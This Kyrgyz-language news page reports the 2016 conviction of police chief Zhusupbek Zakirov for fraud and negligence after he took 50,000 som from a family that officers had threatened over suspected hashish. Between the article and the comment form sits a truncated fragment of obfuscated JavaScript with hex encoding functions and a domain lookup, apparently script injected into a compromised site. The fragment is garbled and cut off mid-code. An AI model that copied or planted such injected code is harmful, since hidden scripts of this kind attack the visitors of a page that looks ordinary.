Menu

Милициянын шаардык бөлүмчөсүнүн начальниги мүлкүн конфискациялоо менен 5 жылга эркиндигинен ажыратылып, 200 000 айыпка кириптер болду

Бөлүшүү:

2015-жылдын 18-сентябрь күнү саат 08.00 чамасында Кыргыз Республикасынын ИИМнин жана Жалал-Абад областтык ИИБнун кызматкерлери Биринчи Май райондук сотунун токтомунун негизинде тергөөдөгү кылмыш иштин чегинде Кочкор-Ата шаарында жайгашкан батирге келишип, турак-жайына тинтүү жүргүзүшүп, бөлмөсүнөн ширенкенин кутучасындагы кара-күрөн түстөгү гашиш баңги каражатына окшогон зат таап алышып, турак жайдын ээлери А.Р. менен И.Г.ны эгерде алардын шартын аткарбаса кылмыш-жаза жоопкерчилигине тартуу, аларды убактылуу кармоо изоляторуна киргизүү жөнүндө коркутушуп, алардан 300 000 сом пара талап кылышкан.

Закиров Жусупбек милиция бөлүмчөсүнүн башчысы болуп иштеп, мурдатан Р.А.нын  үй-бүлөсү менен жакын жана ишеничтүү алакада болгондуктан, батирдин ээси А.Р. Кыргыз Республикасынын ИИМнин жана Жалал-Абад областтык ИИБнун кызматкерлеринен көз каранды экендигинен пайдаланып, жеңил пайда табуу максатында аларга психикалык жактан кысым көрсөтүп, жардам берүү үчүн ишеничине кирген. Ал 2015-жылдын 18-сентябрынан 22-сентябрына чейинки аралыкта батирдин ээси И.Г. менен бир нече жолу жолугуп, аны менен бир нече жолу уюлдук телефон менен байланышып, анын үйүндө тинтүү жүргүзгөн милиция кызматкерлери калган акчаны сурап жаткандыгын айтып, акча аларга ал аркылуу берилээрин түшүндүрүп, 22-сентябрь 2015-жылы саат 22лер чамасында алардын үйүнө келип, үйдүн короосунда И.Г.дан алдоо жолу менен кызмат абалынан пайдаланып, 50 000 сом акча алгандан кийин Кыргыз Республикасынын Мамлекеттик улуттук коопсуздук комитетинин Жалал-Абад областы боюнча башкармасынын кызматкерлери тарабынан кармалып, анын чөнтөгүнөн И.Г. берген 50 000 сом акча алынып, тиешелүү процессуалдык документтер түзүлгөн.

Базар-Коргон райондук сотунун 2016-жылдын 3-февралындагы өкүмү менен Закиров Жусупбек Абдибайитович Кыргыз Республикасынын КЖКнин 166-ст. 4-б. 3-п. (Алдамчылык) менен күнөөлүү деп табылып, мүлкүн конфискациялоо менен 5 (беш) жылга эркиндигинен ажыратылган. Ж.А.Закировдун жосунунда Кыргыз Республикасынын КЖКнин 304-ст. 2-б. (Кызматтык абалынан кыянаттык менен пайдалануу) кылмыштын курамы жок болгондуктан акталган.

Жалал-Абад областтык сотунун жазык иштери жана административдик укук бузуулар жөнүндөгү иштер боюнча соттук коллегиясынын 2016-жылдын 17-мартындагы өкүмү менен Базар-Коргон райондук сотунун 2016-жылдын 3-февралындагы өкүмү өзгөртүлүп, Закиров Жусупбек Абдибайитович Кыргыз Республикасынын КЖКнин 316-ст. 1-б. (Шалаакылык) менен күнөөлүү деп табылып, ал статья боюнча эсептик көрсөткүчтүн эки миң өлчөмүндө (200 000 сом) айыпка кириптер кылынган. Кыргыз Республикасынын КЖКнин 59-ст. негизинде биротоло мүлкүн конфискациялоо менен 5 (беш) жылга эркиндигинен ажыратылып, эсептик көрсөткүчтүн эки миң өлчөмүндө (200 000 сом) айыпка кириптер кылынган.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 7 + 1 =

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: